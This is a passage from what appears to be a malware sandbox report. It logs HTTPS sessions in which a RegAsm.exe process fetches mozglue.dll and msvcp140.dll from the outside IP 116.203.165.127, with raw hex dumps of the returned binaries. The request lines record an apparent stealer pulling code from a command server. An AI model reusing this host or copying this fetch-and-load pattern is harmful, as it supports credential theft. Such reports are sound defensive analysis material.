2024-09-20 09:07:42 UTC	16384	IN	Data Raw: ee 1a 01 c2 89 95 08 ff ff ff 8b bd 2c ff ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 1f 01 d6 89 b5 Data Ascii: ,0<48%8A)$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49750	116.203.165.127	443	7516	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-20 09:07:43 UTC	199	OUT	GET /mozglue.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Connection: Keep-Alive Cache-Control: no-cache
2024-09-20 09:07:43 UTC	260	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 20 Sep 2024 09:07:43 GMT Content-Type: application/octet-stream Content-Length: 608080 Connection: close Last-Modified: Friday, 20-Sep-2024 09:07:43 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-20 09:07:43 UTC	16124	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W,
2024-09-20 09:07:43 UTC	16384	IN	Data Raw: 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 31 ff ff ff 8d 41 24 50 e8 fb 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 62 ff ff ff 8d 41 24 50 e8 df 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc eb 92 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 56 8b 75 0c 8b 8e b0 00 00 00 83 f9 10 0f 83 e4 00 00 00 c7 86 ac 00 00 00 00 00 00 00 c7 86 b0 00 00 00 0f 00 00 00 c6 86 9c 00 00 00 00 8b 8e 98 00 00 00 83 f9 10 0f 83 e0 00 00 00 c7 86 94 00 00 00 00 00 00 00 c7 86 98 00 00 00 0f 00 00 00 c6 86 84 00 00 00 00 8b 8e 80 00 00 00 83 f9 10 0f 83 dc 00 00 00 c7 46 7c 00 00 00 00 c7 86 80 00 00 00 0f 00 00 00 c6 46 6c 00 8b 4e 68 83 f9 10 0f 83 de 00 00 00 c7 46 64 00 00 00 00 c7 46 68 0f 00 00 00 c6 46 54 00 8b 4e 50 83 f9 10 0f 83 e3 00 00 00 c7 46 Data Ascii: #H1A$P~#HbA$P~#HUVuF\|FlNhFdFhFTNPF
2024-09-20 09:07:43 UTC	16384	IN	Data Raw: 45 a8 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 bd 05 00 00 50 e8 7a d3 01 00 83 c4 04 e9 e1 f9 ff ff 8b 45 90 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 b4 05 00 00 50 e8 57 d3 01 00 83 c4 04 e9 dc f9 ff ff 8b 85 78 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 a8 05 00 00 50 e8 31 d3 01 00 83 c4 04 e9 d4 f9 ff ff 8b 85 60 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 9c 05 00 00 50 e8 0b d3 01 00 83 c4 04 e9 d2 f9 ff ff 8b 85 48 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 90 05 00 00 50 e8 e5 d2 01 00 83 c4 04 e9 d6 f9 ff ff 8b b5 24 ff ff ff 89 0e 8b 85 2c ff ff ff 89 46 04 8b 4d f0 31 e9 e8 52 27 03 00 89 f0 81 c4 d0 00 00 00 5e 5f 5b 5d c3 89 f1 89 fa ff b5 30 ff ff ff e9 30 f4 ff ff 89 f1 81 c6 4c ff ff ff 39 c8 74 63 8d 8d 3c ff ff Data Ascii: EPzEPWxP1`PHP$,FM1R'^_[]00L9tc<
2024-09-20 09:07:43 UTC	16384	IN	Data Raw: c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 03 b9 59 17 b7 d1 89 f8 f7 e1 89 d1 c1 e9 0d 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 02 89 f8 c1 e8 05 b9 c5 5a 7c 0a f7 e1 89 d1 c1 e9 07 bb ff 00 00 00 89 c8 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c1 80 c9 30 ba 83 de 1b 43 89 f8 f7 e2 8b 06 8b 7d 08 88 4c 38 01 c1 ea 12 89 d0 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c2 80 ca 30 89 f1 8b 06 8b 75 08 88 14 06 8b 39 8d 47 07 89 01 83 c7 0d b9 cd cc cc cc 8b 75 ec 89 f0 f7 e1 89 d1 c1 e9 03 8d 04 09 8d 04 80 89 f3 29 c3 80 cb 30 89 c8 ba cd cc cc cc f7 e2 8b 45 08 88 1c 38 89 c3 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 7d 0c 8b 07 88 4c 18 05 b9 1f 85 Data Ascii: )0LY)0LZ\|!i(0C}L8!i(0u9Gu)0E8)0}L
2024-09-20 09:07:43 UTC	16384	IN	Data Raw: 04 89 45 f0 8b 06 8b 4e 04 85 c9 0f 8e b3 00 00 00 31 c9 8d 14 08 83 c2 0c f2 0f 10 42 f4 8b 5d f0 f2 0f 11 04 0b 8b 7a fc c7 42 fc 00 00 00 00 89 7c 0b 08 8b 1e 8b 7e 04 8d 3c 7f 8d 3c bb 83 c1 0c 39 fa 72 cd e9 81 00 00 00 8b 06 8d 0c 49 8d 0c 88 89 4d f0 31 d2 8d 1c 10 83 c3 0c f2 0f 10 43 f4 f2 0f 11 04 17 8b 4b fc c7 43 fc 00 00 00 00 89 4c 17 08 83 c2 0c 3b 5d f0 72 da 8b 46 04 85 c0 0f 8e 02 ff ff ff 8b 1e 8d 04 40 8d 04 83 89 45 f0 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 ec 52 01 00 83 c4 04 83 c3 0c 3b 5d f0 0f 83 d4 fe ff ff eb db 31 c0 40 89 45 ec e9 27 ff ff ff 8d 0c 49 8d 3c 88 89 c3 39 fb 73 20 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 b0 52 01 00 83 c4 04 83 c3 0c 39 fb 72 e2 8b 1e 53 e8 9e 52 01 00 83 c4 04 8b 45 f0 89 06 8b Data Ascii: EN1B]zB\|~<<9rIM1CKCL;]rF@ECCtPR;]1@E'I<9s CCtPR9rSRE
2024-09-20 09:07:43 UTC	16384	IN	Data Raw: ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 1b 89 c8 e9 b3 fe ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 07 89 c8 e9 c2 fe ff ff ff 15 b0 bf 08 10 cc cc cc cc 55 89 e5 57 56 89 ce 8b 79 20 85 ff 74 28 f0 ff 4f 38 75 22 8b 4f 14 83 f9 10 73 5f c7 47 10 00 00 00 00 c7 47 14 0f 00 00 00 c6 07 00 57 e8 2d 13 01 00 83 c4 04 8b 7e 18 c7 46 18 00 00 00 00 85 ff 74 1c 8b 07 85 c0 74 0d 50 ff 15 04 be 08 10 c7 07 00 00 00 00 57 e8 03 13 01 00 83 c4 04 8b 46 08 85 c0 75 2f 8b 46 04 85 c0 74 09 50 e8 ec 12 01 00 83 c4 04 5e 5f 5d c3 8b 07 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 76 20 50 e8 cf 12 01 00 83 c4 04 eb 86 c7 05 f4 f8 08 10 1a 2b 08 10 cc b9 18 00 00 00 e8 0d 80 02 00 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 04 89 c8 eb cf ff 15 b0 bf 08 10 cc cc cc cc cc cc cc cc cc Data Ascii: H) sH) sUWVy t(O8u"Os_GGW-~FttPWFu/FtP^_]v P+H) s
2024-09-20 09:07:43 UTC	16384	IN	Data Raw: 85 db 0f 85 ad 07 00 00 c7 44 24 30 00 00 00 00 c7 44 24 34 07 00 00 00 66 c7 44 24 20 00 00 57 e8 e1 37 06 00 83 c4 04 89 c6 83 f8 07 8b 5c 24 04 0f 87 4b 03 00 00 8d 44 24 20 89 70 10 89 f1 01 f1 51 57 50 e8 fe 37 06 00 83 c4 0c 66 c7 44 74 20 00 00 8b 44 24 30 8b 4c 24 34 89 ca 29 c2 83 fa 11 0f 82 fd 05 00 00 8d 50 11 89 54 24 30 83 f9 08 72 06 8b 4c 24 20 eb 04 8d 4c 24 20 0f b7 15 de 4d 08 10 66 89 54 41 20 0f 10 05 ce 4d 08 10 0f 11 44 41 10 0f 10 05 be 4d 08 10 0f 11 04 41 66 c7 44 41 22 00 00 bf 10 00 00 00 57 e8 60 3e 00 00 83 c4 04 89 c6 8b 45 0c f2 0f 10 40 20 f2 0f 11 06 f2 0f 10 40 28 f2 0f 11 46 08 83 7c 24 34 08 72 06 8b 44 24 20 eb 04 8d 44 24 20 57 56 6a 03 6a 00 50 53 ff 15 2c e3 08 10 89 c3 56 e8 9e d2 00 00 83 c4 04 8b 4c 24 34 83 f9 Data Ascii: D$0D$4fD$ W7\$KD$ pQWP7fDt D$0L$4)PT$0rL$ L$ MfTA MDAMAfDA"W`>E@ @(F\|$4rD$ D$ WVjjPS,VL$4
2024-09-20 09:07:43 UTC	16384	IN	Data Raw: 08 00 00 00 85 ff 0f 84 0b 06 00 00 83 fb 08 0f 86 cc 02 00 00 83 c3 0f 89 d8 83 e0 f0 89 44 24 1c c1 eb 04 c1 e3 05 8d 34 1f 83 c6 50 80 7f 3c 00 89 7c 24 10 89 5c 24 18 74 0a 83 7f 40 00 0f 84 29 06 00 00 8d 47 0c 89 44 24 20 50 ff 15 30 be 08 10 8b 16 85 d2 0f 84 38 01 00 00 83 7a 08 00 0f 84 2e 01 00 00 8b 4a 04 8b 74 8a 0c 85 f6 0f 84 eb 01 00 00 8b 5f 40 85 db 75 60 0f bc fe 89 cb c1 e3 05 09 fb 0f bb fe 8b 7c 24 10 8b 44 24 18 0f af 5c 07 58 8b 44 07 68 89 74 8a 0c 01 d0 01 c3 83 42 08 ff 85 db 0f 84 a2 05 00 00 8b 44 24 1c 01 47 2c ff 74 24 20 ff 15 b0 be 08 10 85 db 0f 84 93 05 00 00 8b 4c 24 60 31 e9 e8 51 e7 01 00 89 d8 8d 65 f4 5e 5f 5b 5d c3 89 4c 24 04 89 54 24 14 8b 0b 8b 7b 04 89 3c 24 0f a4 cf 17 89 c8 c1 e0 17 31 c8 8b 53 0c 33 3c 24 89 Data Ascii: D$4P<\|$\$t@)GD$ P08z.Jt_@u`\|$D$\XDhtBD$G,t$ L$`1Qe^_[]L$T${<$1S3<$
2024-09-20 09:07:43 UTC	16384	IN	Data Raw: fe 83 e0 01 09 c8 89 42 04 89 13 8d 44 24 58 e9 75 ff ff ff c7 44 24 3c 00 00 00 00 8b 5c 24 04 e9 a5 fe ff ff 31 d2 a8 10 0f 44 54 24 18 31 c9 39 f2 0f 97 c0 0f 82 e1 fe ff ff 88 c1 e9 d5 fe ff ff b0 01 e9 ec fd ff ff 8b 46 04 83 f8 01 0f 87 13 01 00 00 89 f2 8b 06 31 c9 85 c0 8b 74 24 1c 0f 84 39 04 00 00 8b 48 04 83 e1 fe 89 0a 89 d1 83 e1 fe 89 54 24 04 8b 50 04 83 e2 01 09 ca 89 50 04 8b 54 24 04 8b 52 04 83 e2 01 09 ca 89 50 04 8b 4c 24 04 80 49 04 01 83 60 04 01 89 c1 e9 fb 03 00 00 c7 44 24 28 00 00 00 00 e9 f9 fd ff ff 8d 74 24 54 89 f1 e8 37 0b fe ff 8b 1e e9 47 ff ff ff 83 e3 fe 89 58 04 89 d6 8b 1a 85 db 0f 84 fb 01 00 00 8b 43 04 83 e0 fe 89 06 89 f0 83 e0 fe 8b 4b 04 83 e1 01 09 c1 89 4b 04 8b 4e 04 89 c8 83 e0 fe 0f 84 c0 01 00 00 8b 10 83 Data Ascii: BD$XuD$<\$1DT$19F1t$9HT$PPT$RPL$I`D$(t$T7GXCKKN
2024-09-20 09:07:43 UTC	16384	IN	Data Raw: 00 00 00 0f 44 4c 24 04 31 db 39 c1 0f 97 c1 72 d1 88 cb 8b 50 04 83 e2 fe eb cc 83 e3 fe 89 1a 89 d6 83 e6 fe 8b 18 8b 48 04 83 e1 01 09 f1 89 48 04 85 db 0f 84 8d 0a 00 00 80 63 04 fe 8b 74 24 14 39 16 75 07 89 06 e9 69 ff ff ff 83 e0 fe 8b 56 04 83 e2 01 8d 0c 02 89 4e 04 85 c0 0f 84 25 0a 00 00 8b 08 83 e1 fe 09 d1 89 4e 04 89 30 8b 4e 04 83 e1 01 8b 50 04 83 e2 fe 09 ca 89 50 04 80 4e 04 01 85 ff 0f 84 1f 0a 00 00 39 37 0f 84 a0 05 00 00 e9 e0 05 00 00 8b 4c 24 1c 8b 19 89 d9 ba 00 f0 ff ff 21 d1 8b 70 08 21 d6 31 d2 39 f1 0f 97 c2 b9 ff ff ff ff 0f 42 d1 85 d2 0f 85 59 05 00 00 e9 c0 05 00 00 89 c1 85 d2 0f 85 c2 fe ff ff 8b 54 24 04 c7 02 00 00 00 00 8b 4c 24 08 c7 44 b1 14 01 00 00 00 83 fb 01 0f 84 17 02 00 00 89 10 8b 54 24 20 8b 44 24 48 85 c0 Data Ascii: DL$19rPHHct$9uiVN%N0NPPN97L$!p!19BYT$L$DT$ D$H

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49751	116.203.165.127	443	7516	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-20 09:07:44 UTC	200	OUT	GET /msvcp140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Connection: Keep-Alive Cache-Control: no-cache
2024-09-20 09:07:45 UTC	260	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 20 Sep 2024 09:07:45 GMT Content-Type: application/octet-stream Content-Length: 450024 Connection: close Last-Modified: Friday, 20-Sep-2024 09:07:45 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-20 09:07:45 UTC	16124	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_
2024-09-20 09:07:45 UTC	16384	IN	Data Raw: 2d 00 62 00 61 00 00 00 68 00 72 00 2d 00 68 00 72 00 00 00 68 00 75 00 2d 00 68 00 75 00 00 00 68 00 79 00 2d 00 61 00 6d 00 00 00 69 00 64 00 2d 00 69 00 64 00 00 00 69 00 73 00 2d 00 69 00 73 00 00 00 69 00 74 00 2d 00 63 00 68 00 00 00 69 00 74 00 2d 00 69 00 74 00 00 00 6a 00 61 00 2d 00 6a 00 70 00 00 00 6b 00 61 00 2d 00 67 00 65 00 00 00 6b 00 6b 00 2d 00 6b 00 7a 00 00 00 6b 00 6e 00 2d 00 69 00 6e 00 00 00 6b 00 6f 00 2d 00 6b 00 72 00 00 00 6b 00 6f 00 6b 00 2d 00 69 00 6e 00 00 00 00 00 6b 00 79 00 2d 00 6b 00 67 00 00 00 6c 00 74 00 2d 00 6c 00 74 00 00 00 6c 00 76 00 2d 00 6c 00 76 00 00 00 6d 00 69 00 2d 00 6e 00 7a 00 00 00 6d 00 6b 00 2d 00 6d 00 6b 00 00 00 6d 00 6c 00 2d 00 69 00 6e 00 00 00 6d 00 6e 00 2d 00 6d 00 6e 00 00 00 6d 00 72 Data Ascii: -bahr-hrhu-huhy-amid-idis-isit-chit-itja-jpka-gekk-kzkn-inko-krkok-inky-kglt-ltlv-lvmi-nzmk-mkml-inmn-mnmr
2024-09-20 09:07:45 UTC	16384	IN	Data Raw: 04 00 00 00 04 8b 00 10 18 8b 00 10 78 8a 00 10 e8 7b 00 10 04 7c 00 10 00 00 00 00 d8 4c 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 f4 8a 00 10 00 00 00 00 01 00 00 00 04 00 00 00 44 8b 00 10 58 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 14 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 34 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 84 8b 00 10 98 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 34 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 74 8b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 58 4d 06 10 c8 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 d8 8b 00 10 ec 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 58 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff Data Ascii: x{\|L@DX}0}}M@4}0}}4M@tXM}0}}XM
2024-09-20 09:07:45 UTC	16384	IN	Data Raw: 0f bf 45 fc d9 5d e8 d9 45 10 d9 45 e8 d9 c0 89 45 f4 de ea d9 c9 d9 5d e8 d9 45 e8 d9 55 10 d9 ee da e9 df e0 f6 c4 44 7b 05 dd d8 d9 45 10 8d 45 ec 50 8d 45 f8 50 d9 5d ec e8 fc fa ff ff 59 59 3b f3 0f 8c aa fd ff ff eb 10 8d 4e 01 d9 1c b7 3b cb 7d 06 d9 ee d9 5c b7 04 5e 8b c7 5f 5b c9 c3 55 8b ec 51 56 33 f6 39 75 14 7e 37 d9 ee 57 8b 7d 10 d9 04 b7 d9 5d fc d9 45 fc dd e1 df e0 dd d9 f6 c4 44 7b 1a 51 d9 1c 24 ff 75 0c ff 75 08 e8 97 fc ff ff d9 ee 83 c4 0c 46 3b 75 14 7c d2 dd d8 5f 8b 45 08 5e c9 c3 55 8b ec 51 51 8b 4d 0c 85 c9 75 04 d9 ee c9 c3 8b 55 08 83 f9 01 0f 84 9d 00 00 00 d9 02 d9 5d fc d9 45 fc d9 ee dd e1 df e0 f6 c4 44 0f 8b 82 00 00 00 d9 42 04 d9 5d fc d9 45 fc dd e1 df e0 f6 c4 44 7b 6e 83 f9 02 74 5d d9 42 08 d9 5d fc d9 45 fc dd Data Ascii: E]EEE]EUD{EEPEP]YY;N;}\^_[UQV39u~7W}]ED{Q$uuF;u\|_E^UQQMuU]EDB]ED{nt]B]E
2024-09-20 09:07:45 UTC	16384	IN	Data Raw: 0f b7 06 83 f8 61 74 05 83 f8 41 75 0f 03 f7 0f b7 06 66 3b c1 74 0e 66 3b c2 74 09 8b 45 08 33 db 8b 30 eb 43 03 f7 6a 04 5b 89 75 f8 66 83 3e 28 89 5d f4 75 32 8b de 03 df 68 07 01 00 00 0f b7 03 50 ff 15 ac 72 06 10 59 59 85 c0 75 e9 0f b7 03 83 f8 5f 74 e1 89 5d f8 8b 5d f4 83 f8 29 75 06 8b 75 f8 83 c6 02 8b 45 0c 85 c0 74 02 89 30 8b 45 08 5f 89 30 8b c3 5e 5b c9 c3 55 8b ec 83 ec 48 a1 c0 41 06 10 33 c5 89 45 fc 6b 4d 18 07 33 d2 8b 45 10 53 8b 5d 14 56 8b 75 0c 89 75 d0 89 45 b8 89 55 bc 89 55 c4 89 55 c0 89 4d cc 57 8b fa 83 f9 23 7e 06 6a 23 59 89 4d cc 6a 30 58 89 13 89 53 04 66 39 06 75 12 c7 45 c4 01 00 00 00 83 c6 02 66 39 06 74 f8 89 75 d0 0f b7 0e b8 b8 2d 00 10 89 4d c8 8b 4d cc c7 45 d4 16 00 00 00 8b 75 c8 66 39 30 8b 75 d0 74 0b 83 c0 Data Ascii: atAuf;tf;tE30Cj[uf>(]u2hPrYYu_t]])uuEt0E_0^[UHA3EkM3ES]VuuEUUUMW#~j#YMj0XSf9uEf9tu-MMEuf90ut
2024-09-20 09:07:45 UTC	16384	IN	Data Raw: 03 8d 41 1c c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 09 e7 03 10 64 a1 00 00 00 00 50 a1 c0 41 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 e8 79 7b 00 00 50 e8 71 d8 ff ff 59 8b 40 0c 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc 55 8b ec 83 79 38 00 8b 45 08 75 03 83 c8 04 ff 75 0c 50 e8 28 00 00 00 5d c2 08 00 cc cc cc cc 55 8b ec 6a 00 ff 75 08 e8 13 00 00 00 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 83 ec 1c 83 e0 17 89 41 0c 8b 49 10 56 23 c8 74 43 80 7d 0c 00 75 42 f6 c1 04 74 07 be 78 54 00 10 eb 0f be 90 54 00 10 f6 c1 02 75 05 be a8 54 00 10 8d 45 f8 6a 01 50 e8 f7 13 00 00 59 59 50 56 8d 4d e4 e8 bc e2 ff ff 68 a4 1a 04 10 8d 45 e4 50 eb 09 5e c9 c2 08 00 6a 00 6a 00 e8 f0 93 02 00 cc 53 57 Data Ascii: AUjhdPA3PEdy{PqY@MdYUy8EuuP(]Uju]UEAIV#tC}uBtxTTuTEjPYYPVMhEP^jjSW
2024-09-20 09:07:45 UTC	16384	IN	Data Raw: 89 45 fc 89 5f 10 e8 bd 54 02 00 8b 45 f8 83 c4 10 c6 04 1e 00 83 f8 10 72 0b 40 50 ff 37 e8 54 95 ff ff 59 59 89 37 8b c7 5f 5e 5b c9 c2 0c 00 e8 b3 be ff ff cc 55 8b ec 83 ec 0c 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d fc 3b c2 72 69 8b 43 14 8d 3c 11 57 8b cb 89 45 f4 e8 88 b1 ff ff 8b f0 8d 4e 01 51 e8 b2 94 ff ff 59 ff 75 18 89 7b 10 8d 4d 0c ff 75 14 8b 7d f4 89 45 f8 89 73 14 ff 75 10 ff 75 fc 83 ff 10 72 17 8b 33 56 50 e8 6b 03 00 00 8d 47 01 50 56 e8 d2 94 ff ff 59 59 eb 07 53 50 e8 56 03 00 00 8b 45 f8 5f 89 03 8b c3 5e 5b c9 c2 14 00 e8 25 be ff ff cc 55 8b ec 83 ec 10 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d f0 3b c2 0f 82 8f 00 00 00 8b 43 14 8d 3c 11 57 8b cb 89 45 fc e8 f6 b0 ff ff 8b f0 8d 4e 01 51 e8 Data Ascii: E_TEr@P7TYY7_^[UUSVWK+M;riC<WENQYu{Mu}Esuur3VPkGPVYYSPVE_^[%UUSVWK+M;C<WENQ
2024-09-20 09:07:45 UTC	16384	IN	Data Raw: 01 75 04 3b d7 74 3a 8b 5d 08 6a 04 59 89 4d d4 53 33 c0 03 04 cb 52 13 7c cb 04 56 57 50 e8 f1 02 02 00 5b 8b 5d 08 8b f9 8b 4d d4 8b 75 d8 89 54 cb 04 8b 55 e8 89 04 cb 83 e9 01 89 4d d4 79 cf 5f 5e 5b c9 c3 55 8b ec 51 56 8b 75 14 33 d2 85 f6 7e 5f 53 8b 5d 08 29 5d 10 57 8b fb 89 75 fc 8b 5d 10 8b 0c 3b 03 0f 8b 44 3b 04 13 47 04 03 ca 89 0f 8d 7f 08 83 d0 00 8b d0 89 57 fc 83 67 fc 00 83 ee 01 75 dc 0b c6 8b 5d 08 74 22 8b 4d fc 3b 4d 0c 7d 1a 01 14 cb 8b 54 cb 04 13 d6 33 f6 89 54 cb 04 8b c2 21 74 cb 04 41 0b c6 75 e1 5f 5b 5e c9 c3 55 8b ec 8b 55 08 56 8b 75 0c 83 c2 f8 8d 14 f2 8b 02 0b 42 04 75 0b 8d 52 f8 4e 8b 0a 0b 4a 04 74 f5 8b c6 5e 5d c3 55 8b ec 53 56 33 db 33 f6 39 5d 0c 7e 30 57 8b 7d 08 ff 75 14 ff 75 10 ff 74 f7 04 ff 34 f7 e8 73 03 Data Ascii: u;t:]jYMS3R\|VWP[]MuTUMy_^[UQVu3~_S])]Wu];D;GWgu]t"M;M}T3T!tAu_[^UUVuBuRNJt^]USV339]~0W}uut4s
2024-09-20 09:07:45 UTC	16384	IN	Data Raw: cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 7c 69 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 e8 65 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 56 8b f1 ff 76 0c c7 06 4c 68 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 56 8b f1 ff 76 0c c7 06 8c 66 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc 56 8b f1 c7 06 50 69 00 10 e8 e2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 c7 06 90 67 00 10 e8 c2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 ff 76 08 c7 06 7c 69 00 Data Ascii: UQEVuF\|ifrjFqY^UQEVuFefrjFqY^VvLhqY(R^VvfqY(R^VPiq(R^Vgq(R^Vv\|i
